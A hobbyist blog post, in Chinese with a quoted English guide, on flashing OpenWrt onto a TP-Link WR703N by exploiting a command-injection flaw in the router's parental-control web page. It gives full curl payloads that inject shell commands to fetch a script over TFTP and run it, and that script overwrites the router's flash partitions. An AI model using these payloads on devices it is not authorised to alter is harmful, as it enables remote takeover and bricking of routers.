TP-Link 703n V1.7以上版本刷OpenWrt
我入手TP-Link 703n已经有很长时间了,其实我家里还有其他路由器,性能也比703N好,之所以买这个路由器,首先就是因为他很小巧,比手掌小,并且还能刷各种嵌入式Linux系统,网上对于703N的评价都还不错,都说是属于入门级别的,好在价格也比较便宜,所以我就入了。
但是这个路由器一出厂就是刷的最新版官方系统,像我这种折腾的,怎么可能止步于此?网上查了下TP-Link 703n V1.7以上版本不能直接刷OpenWrt,除非用编程器,整个人都不好了,刚刚买来的东西,我可不想动电烙铁。就在我在谷歌上面找时看见了一篇文章,下面就是原文。
- Upgrade your new WR703N V1.17.1 to openwrt.
- WARNING: THIS CAN BRICK YOUR DEVICE. DO NOT RELY ON ANY OF THIS INFORMATION.
- These are just hints how I did it.
- If you have no experience with wr703n's. Just buy a MR3020.
- You'll need:
- * A FTP server (in my case 192.168.1.9, I advise to use the same IP or understand what the hell you're doing)
- * An unix or mac workstation with curl (can be the same box)
- * A general knowledge of unix commands.
- * An openwrt image. I make my own but stock 12.09 might work.
- * A binary busybox for mips static compiled.
- The general idea:
- * Put a script on your tp-link wr703n
- * Put a better busybox on your tp-link wr703n
- * Trick the wr703n into executing some commands to run this script.
- The script:
- * get the first en second part of the image from tftp
- * flash the first part of the image (1024k) to the mtd partition named kernel
- * flash the rest of the image (2819k) to the mtd partition named rootfs
- * reboot the box with openwrt on it.
- First setup the tftp server and put the following files there:
- === file aa cut from here ======
- cd /tmp
- tftp -gl i1 192.168.1.9
- tftp -gl i2 192.168.1.9
- tftp -gl busybox 192.168.1.9
- chmod 755 busybox
- ./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync
- ./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync
- ./busybox reboot -f
- echo blaaat
- === /file aa cut to here =======
- Put the rest also there:
- * busybox
- * openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin
- Cut the openwrt image in 2 parts. (Yes these commands):
- ??These commands can take a while since I had no interrest in calculating a better blocksize.
- dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576
- dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576
- now there are 4 files in your TFTP directory: aa, busybox, i1, i2
- Now let's take a router and have it set to the factory settings.
- Run these commands on you're workstation.
- # !!DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).!!
- # First it wants a password set, let's do that. (the password is admin42 after this).
- curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.1.1/'
- # Secondly it wants to have parental control enabled (probably the once in a lifetime opportunity to use this).
- curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'
- # That being done, now all we need is to just simply exploit the router.
- # readable it does:
- # cd /tmp ; tftp -gl aa 192.168.1.9; sh aa
- # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
- curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'
- # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
- Just wait until it starts to blink, than openwrt is loading. Depending on your image you can reach it on it's mac address.
- If you have no experience with wr703n's. Just buy a MR3020.
貌似是俄罗斯论坛的一篇文章,利用Web漏洞来给703N刷机,顿时整个人都好了。
把路由器恢复默认设置,就是用卡针戳下路由器上面的小洞10秒。
1.把电脑IP改为192.168.1.100
2.进入该目录,先运行tftp32
3.然后进入cmd命令行,进入该目录,键入命令
curl -o - -b "tLargeScreenP=1;subType=pcSub;Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D;ChgPwdSubTag=tru" "http://192.168.1.1/"
4.提示符出来后键入
curl -o - -b "tLargeScreenP=1;subType=pcSub;Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D;ChgPwdSubTag=" --referer "http://192.168.1.1/userRpm/ParentCtrlRpm.htm" "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1"
5.提示符出来后键入
curl -o - -b "tLargeScreenP=1;subType=pcSub;Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D;ChgPwdSubTag=" --referer "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1" "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.100;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6"
耐心等待3分钟就刷好了。
刷好后没配置的时候只能lan连接。
刷OpenWrt到这里就成功了,事实上最后我还是用的编程夹。
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。